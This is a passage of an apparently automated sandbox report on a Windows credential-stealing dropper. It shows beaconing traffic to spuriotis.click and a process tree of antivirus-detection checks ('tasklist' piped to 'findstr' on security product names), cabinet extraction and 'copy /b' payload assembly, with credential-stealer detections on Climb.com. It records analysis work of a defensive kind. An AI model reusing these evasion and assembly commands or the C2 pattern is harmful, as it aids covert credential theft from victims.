                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1489&rtt_var=561&sent=355&recv=568&lost=0&retrans=0&sent_bytes=2833&recv_bytes=576249&delivery_rate=1961047&cwnd=236&unsent_bytes=0&cid=eb0c046acc022b7c&ts=4054&x=0"


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.549830172.67.128.1844435660C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-28 08:30:13 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 80
                                                                                                                                                                    Host: spuriotis.click
                                                                                                                                                                    2024-12-28 08:30:13 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d 26 68 77 69 64 3d 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37
                                                                                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=5FwhVM--lll&j=&hwid=7F7C4D63DBC452FCD9AC212D15D33917
                                                                                                                                                                    2024-12-28 08:30:14 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:30:14 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=5jjlqj84vtn0jrh02aj3h31ok9; expires=Wed, 23 Apr 2025 02:16:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qpN1UelAvubqN%2FUk9NQzG%2Bpl%2B%2Fy3UQvXqH%2FzfNIv7XdfvFKH%2B0v1H0lCaMBU4EiI5i5pI7dTkiqg8EMtltyK7Iba1vkwvVFvxxn6VE3YBMSH1UfwbTRGOSaXcEip32fQr1Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f902fe8da614217-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1713&rtt_var=658&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=979&delivery_rate=1643218&cwnd=240&unsent_bytes=0&cid=7e1903bf122cfca6&ts=871&x=0"
                                                                                                                                                                    2024-12-28 08:30:14 UTC240INData Raw: 34 37 62 0d 0a 37 32 6f 5a 48 56 61 74 53 35 6f 45 37 6d 44 32 43 70 39 48 33 44 77 32 67 5a 32 48 42 7a 69 65 33 78 55 31 34 76 57 53 74 75 4b 30 45 54 74 37 49 6f 39 78 71 79 6a 4d 42 64 51 77 72 6d 76 2b 57 42 53 37 76 2b 42 47 65 39 4b 64 50 6b 79 49 77 74 62 75 68 4b 51 47 66 46 4d 31 38 57 53 73 56 49 63 30 73 6b 33 50 48 62 45 49 56 38 7a 4a 79 47 78 79 79 70 35 55 65 34 58 65 34 65 61 49 6f 54 31 76 55 42 36 61 4b 73 70 33 6f 41 53 46 65 38 6c 7a 37 55 5a 71 72 76 4b 73 54 58 58 54 68 69 78 59 67 4a 33 39 7a 71 2f 59 4f 33 56 51 46 2b 78 35 33 6a 4b 5a 53 37 39 4c 33 69 36 72 57 6b 58 75 74 76 41 32 43 2b 65 76 54 56 2b 36 70 62 6e 63 31 6f 51 64 59 58 64 6b 39 7a 37 64 62 71 73 61 68 6b 6e 4b 4d 4a 31
                                                                                                                                                                    Data Ascii: 47b72oZHVatS5oE7mD2Cp9H3Dw2gZ2HBzie3xU14vWStuK0ETt7Io9xqyjMBdQwrmv+WBS7v+BGe9KdPkyIwtbuhKQGfFM18WSsVIc0sk3PHbEIV8zJyGxyyp5Ue4Xe4eaIoT1vUB6aKsp3oASFe8lz7UZqrvKsTXXThixYgJ39zq/YO3VQF+x53jKZS79L3i6rWkXutvA2C+evTV+6pbnc1oQdYXdk9z7dbqsahknKMJ1
                                                                                                                                                                    2024-12-28 08:30:14 UTC914INData Raw: 2f 55 64 48 76 77 7a 4e 53 39 75 64 74 64 6f 65 43 79 6f 4f 45 68 55 46 79 63 54 54 76 50 65 35 59 77 51 4c 43 58 50 4a 32 6c 46 6c 59 79 74 2b 78 53 41 43 6d 75 58 74 53 75 38 4c 2b 35 39 47 66 44 43 6c 55 47 63 45 69 34 45 71 70 4f 71 46 57 73 48 36 59 63 31 65 78 72 76 52 6a 51 65 36 48 64 46 6d 34 71 62 33 38 75 4b 49 53 56 43 6f 58 6e 53 6a 62 52 59 49 6b 33 54 71 30 43 34 35 54 41 72 50 5a 39 47 67 54 36 65 34 6d 54 4a 4b 74 2b 4f 79 79 78 41 42 34 65 6d 48 56 4d 64 56 65 6d 79 69 63 54 2b 55 33 6e 31 6c 42 77 4e 6e 65 56 30 72 61 36 33 4a 33 6f 62 6e 51 6e 5a 75 56 58 56 31 46 4d 4f 59 6e 2f 30 71 4e 50 4e 6b 38 7a 79 71 49 65 47 48 52 78 2b 6f 7a 57 65 32 4c 57 6c 6d 53 6f 64 50 33 72 49 68 42 61 6b 30 2f 36 67 72 54 64 36 5a 58 76 56 72 73 43 62
                                                                                                                                                                    Data Ascii: /UdHvwzNS9udtdoeCyoOEhUFycTTvPe5YwQLCXPJ2lFlYyt+xSACmuXtSu8L+59GfDClUGcEi4EqpOqFWsH6Yc1exrvRjQe6HdFm4qb38uKISVCoXnSjbRYIk3Tq0C45TArPZ9GgT6e4mTJKt+OyyxAB4emHVMdVemyicT+U3n1lBwNneV0ra63J3obnQnZuVXV1FMOYn/0qNPNk8zyqIeGHRx+ozWe2LWlmSodP3rIhBak0/6grTd6ZXvVrsCb
                                                                                                                                                                    2024-12-28 08:30:14 UTC1369INData Raw: 33 32 64 31 0d 0a 34 78 76 6d 4a 70 54 35 59 58 42 6a 4b 59 4f 6c 55 68 79 47 33 51 2b 77 50 36 33 64 6d 38 74 50 6a 50 30 6e 49 36 79 52 50 76 74 72 39 6e 61 69 69 4a 30 41 6b 4f 38 38 6a 39 58 79 6a 56 71 64 6d 30 67 61 64 44 6e 4b 33 36 71 78 4f 65 64 2b 32 59 6c 4f 52 6d 72 6e 42 30 39 77 54 61 55 55 38 39 52 75 78 62 74 6f 4c 67 58 4c 31 64 59 5a 4a 63 65 76 59 2f 58 64 37 79 36 68 55 63 62 75 6c 34 50 4c 57 69 43 74 61 55 52 53 47 4d 76 41 7a 71 6a 69 51 51 66 4d 69 6b 6c 39 71 72 71 76 58 62 6d 7a 61 6d 45 56 76 6a 38 48 7a 2b 37 61 67 41 56 4e 4a 46 2b 77 46 2f 53 2b 64 4d 4a 39 4c 33 67 36 76 64 41 48 4b 7a 66 52 4a 58 4b 61 75 51 77 48 54 6a 38 36 5a 6a 63 51 67 56 46 41 50 6c 43 62 34 62 49 45 59 75 7a 7a 4f 4b 35 46 39 64 37 50 5a 73 58 41 54
                                                                                                                                                                    Data Ascii: 32d14xvmJpT5YXBjKYOlUhyG3Q+wP63dm8tPjP0nI6yRPvtr9naiiJ0AkO88j9XyjVqdm0gadDnK36qxOed+2YlORmrnB09wTaUU89RuxbtoLgXL1dYZJcevY/Xd7y6hUcbul4PLWiCtaURSGMvAzqjiQQfMikl9qrqvXbmzamEVvj8Hz+7agAVNJF+wF/S+dMJ9L3g6vdAHKzfRJXKauQwHTj86ZjcQgVFAPlCb4bIEYuzzOK5F9d7PZsXAT
                                                                                                                                                                    2024-12-28 08:30:14 UTC1369INData Raw: 2b 70 6e 4e 72 71 7a 61 4e 63 61 31 6b 39 34 41 7a 4b 50 5a 38 34 74 31 72 76 46 2b 52 52 41 2f 65 72 38 48 46 32 31 6f 5a 2f 41 4c 4f 4e 2f 4f 36 52 67 52 35 77 51 58 6e 73 42 39 73 7a 74 6a 43 43 63 71 34 74 76 30 78 31 36 36 33 45 52 6d 4c 50 36 30 59 65 30 71 48 6f 38 5a 53 2b 45 48 46 33 62 73 41 63 30 6b 69 63 42 49 5a 76 72 51 2f 33 56 55 57 35 2f 4e 35 49 43 64 7a 74 56 6d 32 4b 6b 73 72 61 30 49 64 53 64 57 67 37 2b 68 48 37 59 4b 55 78 76 30 76 7a 50 34 56 34 65 2f 62 49 76 32 6c 50 72 75 35 44 5a 59 47 67 78 59 2b 79 73 30 56 56 4b 78 4c 70 4a 64 52 50 69 6c 6d 48 57 76 59 54 6d 48 74 52 36 39 72 6d 5a 6e 62 4d 37 46 70 35 67 4c 54 58 38 4b 71 49 57 33 4a 4e 50 2b 77 4b 31 6a 57 30 42 4a 42 44 30 69 4f 64 44 51 61 31 72 50 31 62 46 2f 48 30 58
                                                                                                                                                                    Data Ascii: +pnNrqzaNca1k94AzKPZ84t1rvF+RRA/er8HF21oZ/ALON/O6RgR5wQXnsB9sztjCCcq4tv0x1663ERmLP60Ye0qHo8ZS+EHF3bsAc0kicBIZvrQ/3VUW5/N5ICdztVm2Kksra0IdSdWg7+hH7YKUxv0vzP4V4e/bIv2lPru5DZYGgxY+ys0VVKxLpJdRPilmHWvYTmHtR69rmZnbM7Fp5gLTX8KqIW3JNP+wK1jW0BJBD0iOdDQa1rP1bF/H0X
                                                                                                                                                                    2024-12-28 08:30:14 UTC1369INData Raw: 57 35 62 57 2f 45 31 67 71 47 2f 70 79 78 69 75 57 46 36 6f 6c 31 79 4b 75 65 41 4c 43 2f 72 4e 47 63 2b 75 32 51 51 4b 68 72 66 2b 41 73 61 67 47 66 31 67 34 34 43 2b 74 4e 71 46 58 70 48 72 64 48 71 39 49 65 2f 58 4b 39 46 73 58 77 76 41 6b 59 39 43 78 6f 63 4c 58 71 41 56 4b 57 32 2f 37 50 4d 35 39 67 68 71 48 63 39 35 78 6b 41 6c 2f 77 4e 48 58 55 31 62 64 68 57 64 54 68 49 4c 35 35 72 75 39 4c 30 6b 6f 5a 73 63 4f 34 30 61 41 56 36 6f 6c 2b 77 36 74 56 33 37 47 77 61 68 4b 51 4d 32 48 51 31 50 57 78 64 44 56 6f 35 30 64 54 6e 39 6a 78 53 54 33 59 4b 6b 72 73 54 2f 74 46 2b 73 45 57 2f 62 49 76 30 38 4e 38 59 38 6d 65 70 66 44 2b 4f 2b 33 6e 51 35 42 4b 78 2f 6f 4c 4b 4e 67 74 68 4f 37 59 4e 55 79 69 48 35 78 37 65 66 78 57 78 66 4a 68 57 4e 54 68 62
                                                                                                                                                                    Data Ascii: W5bW/E1gqG/pyxiuWF6ol1yKueALC/rNGc+u2QQKhrf+AsagGf1g44C+tNqFXpHrdHq9Ie/XK9FsXwvAkY9CxocLXqAVKW2/7PM59ghqHc95xkAl/wNHXU1bdhWdThIL55ru9L0koZscO40aAV6ol+w6tV37GwahKQM2HQ1PWxdDVo50dTn9jxST3YKkrsT/tF+sEW/bIv08N8Y8mepfD+O+3nQ5BKx/oLKNgthO7YNUyiH5x7efxWxfJhWNThb
                                                                                                                                                                    2024-12-28 08:30:14 UTC1369INData Raw: 6d 41 4e 70 66 41 48 34 66 72 46 39 75 7a 4f 73 55 4f 38 49 76 31 4a 55 30 63 6e 66 61 67 48 77 6b 56 31 77 31 59 58 52 38 35 4b 64 4e 6a 5a 79 42 73 63 67 72 45 65 4e 41 6f 4a 54 78 6a 57 61 56 56 37 33 7a 4d 6c 6a 64 39 43 38 53 52 72 55 70 66 76 69 32 35 63 67 52 54 4a 75 6c 44 69 69 63 4b 55 38 32 56 44 48 42 70 31 36 51 4c 6e 75 36 58 4e 36 33 37 68 50 52 64 57 47 79 75 43 59 6d 79 68 76 63 6a 6e 6b 65 64 46 2b 72 53 71 7a 52 38 59 7a 73 45 6f 45 37 2b 53 30 61 6b 69 6d 74 45 31 70 7a 59 66 33 77 64 4f 72 42 54 4a 59 4c 2b 77 70 36 57 76 63 4a 72 70 6a 71 53 53 47 56 51 37 71 38 4f 52 50 57 73 36 54 52 6c 2b 2b 32 71 48 52 31 49 5a 65 55 7a 59 61 2f 77 72 65 58 62 34 53 73 6a 37 65 66 35 74 73 58 73 4b 72 37 32 70 77 72 59 35 37 5a 4e 65 50 7a 70 6d
                                                                                                                                                                    Data Ascii: mANpfAH4frF9uzOsUO8Iv1JU0cnfagHwkV1w1YXR85KdNjZyBscgrEeNAoJTxjWaVV73zMljd9C8SRrUpfvi25cgRTJulDiicKU82VDHBp16QLnu6XN637hPRdWGyuCYmyhvcjnkedF+rSqzR8YzsEoE7+S0akimtE1pzYf3wdOrBTJYL+wp6WvcJrpjqSSGVQ7q8ORPWs6TRl++2qHR1IZeUzYa/wreXb4Ssj7ef5tsXsKr72pwrY57ZNePzpm
                                                                                                                                                                    2024-12-28 08:30:14 UTC1369INData Raw: 48 4d 51 6e 7a 47 71 63 4e 38 71 6e 48 2f 4e 64 4b 39 35 5a 63 76 5a 73 46 73 58 31 4f 67 6b 51 72 69 43 77 6f 4b 4a 76 67 4a 73 58 79 37 68 41 4e 4e 48 74 67 65 63 66 4b 6c 31 68 45 74 45 79 2b 66 44 54 6c 72 53 68 55 77 43 72 36 65 68 31 59 54 62 4a 33 46 58 47 70 52 39 32 57 4c 62 55 4e 31 4e 70 69 32 2f 43 32 2f 76 30 4d 46 67 61 4e 71 34 56 30 4b 47 6d 71 4b 43 6c 59 49 77 55 53 6b 4b 67 67 50 5a 61 36 51 30 70 30 36 6e 49 2b 70 50 5a 75 76 77 34 46 73 58 2f 61 38 69 52 4b 79 64 78 66 6a 54 69 51 56 2b 54 69 53 63 65 50 39 7a 33 43 79 2f 61 2b 34 50 6d 58 4e 5a 39 4e 37 68 62 67 6a 50 6e 69 64 78 31 49 4b 35 2b 59 4f 72 48 6d 35 6e 4a 65 45 36 7a 7a 65 66 46 49 35 64 2b 79 48 72 54 56 6e 50 39 65 42 72 64 73 75 4f 59 41 65 49 73 4d 62 67 73 62 59 47
                                                                                                                                                                    Data Ascii: HMQnzGqcN8qnH/NdK95ZcvZsFsX1OgkQriCwoKJvgJsXy7hANNHtgecfKl1hEtEy+fDTlrShUwCr6eh1YTbJ3FXGpR92WLbUN1Npi2/C2/v0MFgaNq4V0KGmqKClYIwUSkKggPZa6Q0p06nI+pPZuvw4FsX/a8iRKydxfjTiQV+TiSceP9z3Cy/a+4PmXNZ9N7hbgjPnidx1IK5+YOrHm5nJeE6zzefFI5d+yHrTVnP9eBrdsuOYAeIsMbgsbYG
                                                                                                                                                                    2024-12-28 08:30:14 UTC1369INData Raw: 51 4b 2f 54 65 6f 4b 5a 74 59 39 41 48 74 42 51 37 77 79 37 4e 4e 53 2b 75 77 50 6e 2b 52 6a 2b 72 6b 6a 6f 55 54 49 57 55 62 6d 78 72 63 63 36 55 47 67 48 69 75 44 4f 68 4b 66 65 54 45 39 45 39 4c 38 66 52 74 59 64 4b 78 79 75 4b 49 74 7a 6f 79 64 32 4c 41 66 4b 78 39 67 78 43 44 51 76 55 62 38 30 6c 45 30 73 7a 7a 62 6c 4c 47 74 6e 4e 73 70 62 48 48 33 6f 43 48 4b 45 35 74 59 70 6f 76 32 30 2b 43 42 62 68 57 73 44 57 46 53 33 58 79 38 2b 52 4b 55 4f 32 74 64 48 69 32 75 74 65 48 73 49 6b 4e 59 46 77 39 32 33 6a 31 54 4b 38 70 68 55 4b 72 50 34 68 4b 51 38 76 37 73 54 5a 77 7a 4f 70 2f 5a 61 2b 77 39 2f 36 50 78 44 4e 53 56 44 66 65 44 71 74 56 72 56 43 6d 50 75 67 73 70 6c 39 6b 73 71 72 62 4b 46 7a 4f 74 6c 35 4e 75 35 72 77 68 71 61 33 50 6e 4e 46 42
                                                                                                                                                                    Data Ascii: QK/TeoKZtY9AHtBQ7wy7NNS+uwPn+Rj+rkjoUTIWUbmxrcc6UGgHiuDOhKfeTE9E9L8fRtYdKxyuKItzoyd2LAfKx9gxCDQvUb80lE0szzblLGtnNspbHH3oCHKE5tYpov20+CBbhWsDWFS3Xy8+RKUO2tdHi2uteHsIkNYFw923j1TK8phUKrP4hKQ8v7sTZwzOp/Za+w9/6PxDNSVDfeDqtVrVCmPugspl9ksqrbKFzOtl5Nu5rwhqa3PnNFB
                                                                                                                                                                    2024-12-28 08:30:14 UTC1369INData Raw: 63 71 41 65 37 63 4e 30 54 70 56 70 79 30 39 44 39 51 6c 37 53 6c 6c 49 4e 68 64 37 41 35 6f 2b 43 57 6c 35 42 65 65 41 67 31 45 4b 79 54 37 64 34 35 78 47 45 62 31 33 43 33 4d 31 6b 62 39 2b 6c 57 48 4f 79 76 36 72 34 72 71 34 72 49 57 6f 77 33 69 53 75 4d 4e 38 57 74 58 72 79 4c 59 31 77 48 65 75 70 36 31 52 41 38 75 6c 50 58 4c 57 63 6f 73 79 53 72 44 39 31 58 42 58 6a 47 2b 39 75 32 6c 53 42 54 75 6b 46 36 6e 64 63 36 50 66 51 63 33 50 32 6b 46 74 37 76 74 71 6c 2f 49 75 2b 50 6c 35 49 48 4d 4e 37 2b 30 69 55 4c 34 35 51 7a 44 65 64 64 77 61 71 35 66 46 74 56 64 2b 52 5a 6e 32 46 68 4e 33 79 72 4c 55 64 61 46 63 35 6e 52 4c 47 4b 35 30 76 76 47 37 53 48 59 5a 52 55 76 6e 79 34 45 6f 50 35 37 4e 63 62 4b 4f 42 36 49 43 56 78 43 5a 59 58 47 37 61 4c 66
                                                                                                                                                                    Data Ascii: cqAe7cN0TpVpy09D9Ql7SllINhd7A5o+CWl5BeeAg1EKyT7d45xGEb13C3M1kb9+lWHOyv6r4rq4rIWow3iSuMN8WtXryLY1wHeup61RA8ulPXLWcosySrD91XBXjG+9u2lSBTukF6ndc6PfQc3P2kFt7vtql/Iu+Pl5IHMN7+0iUL45QzDeddwaq5fFtVd+RZn2FhN3yrLUdaFc5nRLGK50vvG7SHYZRUvny4EoP57NcbKOB6ICVxCZYXG7aLf


                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:03:29:23
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\CLaYpUL3zw.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\CLaYpUL3zw.exe"
                                                                                                                                                                    Imagebase:0x5d0000
                                                                                                                                                                    File size:7'045'120 bytes
                                                                                                                                                                    MD5 hash:CCF904B9AFA2515F1120932E4BD1F148
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:03:29:25
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'062'983 bytes
                                                                                                                                                                    MD5 hash:A3E9A86D6EDE94C3C71D1F7EEA537766
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 11%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:03:29:26
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Set-up.exe"
                                                                                                                                                                    Imagebase:0xc30000
                                                                                                                                                                    File size:6'851'208 bytes
                                                                                                                                                                    MD5 hash:2A99036C44C996CEDEB2042D389FE23C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 70%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:03:29:26
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:03:29:26
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:03:29:29
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                    Imagebase:0xa30000
                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:03:29:29
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                    Imagebase:0x6f0000
                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:03:29:30
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                    Imagebase:0xa30000
                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:03:29:30
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                    Imagebase:0x6f0000
                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:03:29:32
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd /c md 768400
                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:03:29:32
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:extrac32 /Y /E Reflect
                                                                                                                                                                    Imagebase:0xa10000
                                                                                                                                                                    File size:29'184 bytes
                                                                                                                                                                    MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:03:29:33
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:findstr /V "cocks" Articles
                                                                                                                                                                    Imagebase:0x6f0000
                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:03:29:33
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:03:29:34
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:Climb.com V
                                                                                                                                                                    Imagebase:0x4f0000
                                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:15
